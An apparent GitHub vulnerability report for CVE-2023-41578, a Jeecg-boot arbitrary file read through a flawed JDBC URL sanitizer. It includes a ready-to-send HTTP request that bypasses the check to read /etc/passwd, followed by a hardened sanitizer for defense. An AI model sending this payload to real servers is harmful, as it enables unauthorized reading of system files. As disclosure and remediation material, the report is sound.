CVE-2023-41578: Jeecg-boot <=3.5.3 Arbitrary File Read · Issue #1 · Snakinya/Bugs
Jeecg boot up to v3.5.3 was discovered to contain an arbitrary file read vulnerability via the interface /testConnection.
In the `/testConnection` route, a request body is turned into a JDBC connection attempt, so a MySQL connection string supplied by the caller can be used to read arbitrary files. The decompiled handler:

```java
@PostMapping({"/testConnection"})
public Result a(@RequestBody JmreportDynamicDataSourceVo var1) {
    Connection var2 = null;
    String var3 = var1.toString();
    a.info(" local cache key: " + var3);
    Object var4 = this.localCache.a(var3);
    if (g.d(var4)) {
        int var5 = g.e(var4);
        a.info(" local cache value: " + var5);
        if (var5 >= 3) {
            // "data source has already failed to connect more than 3 times, check the configuration"
            return Result.error("数据源已连接错误3次以上,请检查配置信息!");
        }
        if (var5 == 0) {
            return Result.OK("数据库连接成功", true); // "database connection succeeded"
        }
    } else {
        this.localCache.a(var3, 0, 3600000L);
    }
    try {
        Result var6;
        try {
            String var37 = var1.getDbType();
            Result var40;
            if (this.jmReportDbSourceService.isHave(d.cI, var37)) {
                boolean var39 = this.jmreportNoSqlService.testConnection(var1);
                if (var39) {
                    var40 = Result.OK("数据库连接成功", true);
                    return var40;
                } else {
                    this.localCache.a(var3, 1);
                    var40 = Result.error("数据库连接失败:错误未知"); // "connection failed: unknown error"
                    return var40;
                }
            } else {
                // Driver class, URL, user and password all come straight from the request body.
                Class.forName(var1.getDbDriver());
                DriverManager.setLoginTimeout(60);
                String var38 = org.jeecg.modules.jmreport.dyndb.util.b.g(var1.getDbUrl());
                var2 = DriverManager.getConnection(var38, var1.getDbUsername(), var1.getDbPassword());
                if (var2 == null) {
                    this.localCache.a(var3, 1);
                    var40 = Result.OK("数据库连接失败:错误未知", true);
                    return var40;
                    // ... (the remainder of the method is not shown in the report)
```
The URL is sanitized before the connection is opened: the helper `b.g()` called on `var1.getDbUrl()` is meant to neutralize `allowLoadLocalInfile` for MySQL URLs.

```java
public static String g(String var0) {
    if (a(var0, "mysql")) {
        if (var0.indexOf("allowLoadLocalInfile") > 0) {
            // Only the literal value "true" is rewritten (case-insensitively).
            var0 = var0.replaceAll("(?i)allowLoadLocalInfile=true", "allowLoadLocalInfile=false");
        } else {
            var0 = var0 + "&allowLoadLocalInfile=false";
        }
    }
    return var0;
}
```
Only the exact string `allowLoadLocalInfile=true` is replaced, so a differently spelled boolean value passes through the check unchanged and the option stays enabled:

```http
POST /jeecg-boot/jmreport/testConnection HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{
  "id": "1",
  "code": "select * from information_schema.tables",
  "dbType": "jndi",
  "dbDriver": "com.mysql.cj.jdbc.Driver",
  "dbUrl": "jdbc:mysql://localhost:3307/test?allowLoadLocalInfile=yes",
  "dbName": "information_schema",
  "dbUsername": "fileread_/etc/passwd",
  "dbPassword": "password",
  "connectionTimaes": "5"
}
```
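As an added defensive example (not Jeecg's code), the check quoted above is ported next to a hardened version that parses the query string and refuses any `allowLoadLocalInfile` key regardless of its value. The `startsWith("jdbc:mysql:")` test stands in for the page's `a(var0, "mysql")` helper, whose body is not shown; the two extra deny-list keys are Connector/J's companion LOCAL INFILE properties and are an assumption about the deployed driver version.

```java
import java.util.Locale;
import java.util.Set;

// Added example, not Jeecg's code: parse the JDBC URL's query string and refuse
// any attempt to set a denied client property, whatever value it carries
// ("true", "yes", "on", ...), instead of rewriting one literal with a regex.
public final class JdbcUrlSanitizer {
    // Connector/J properties a request body must never control. The first is
    // the one in the report; the other two are its companion LOCAL INFILE keys.
    private static final Set<String> DENIED_KEYS = Set.of(
            "allowloadlocalinfile", "allowloadlocalinfileinpath", "allowurlinlocalinfile");

    /** Port of the check quoted above; only the literal "=true" is rewritten. */
    public static String weakSanitize(String url) {
        if (url.toLowerCase(Locale.ROOT).startsWith("jdbc:mysql:")) { // stands in for a(var0, "mysql")
            if (url.indexOf("allowLoadLocalInfile") > 0) {
                url = url.replaceAll("(?i)allowLoadLocalInfile=true", "allowLoadLocalInfile=false");
            } else {
                url = url + "&allowLoadLocalInfile=false";
            }
        }
        return url;
    }

    /** Refuses the URL if any query key (trimmed, case-folded) is denied or
     *  percent-encoded, then pins the safe value so no default re-enables it. */
    public static String hardenedSanitize(String url) {
        int q = url.indexOf('?');
        if (q >= 0) {
            for (String pair : url.substring(q + 1).split("&")) {
                int eq = pair.indexOf('=');
                String key = (eq < 0 ? pair : pair.substring(0, eq)).trim().toLowerCase(Locale.ROOT);
                if (DENIED_KEYS.contains(key) || key.indexOf('%') >= 0) {
                    throw new IllegalArgumentException("disallowed JDBC property: " + key);
                }
            }
        }
        return url + (q < 0 ? "?" : "&") + "allowLoadLocalInfile=false";
    }

    public static void main(String[] args) {
        String url = "jdbc:mysql://localhost:3307/test?allowLoadLocalInfile=yes"; // constructed sample
        System.out.println(weakSanitize(url)); // the "yes" value survives the regex untouched
        try {
            hardenedSanitize(url);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println(hardenedSanitize("jdbc:mysql://localhost:3306/test?useSSL=false"));
    }
}
```

Because Connector/J reads settings from both the URL and the `java.util.Properties` object, the same `allowLoadLocalInfile=false` should also be pinned in any `Properties` passed to `DriverManager.getConnection`, and the driver class name should be checked against an allow list rather than loaded from the request.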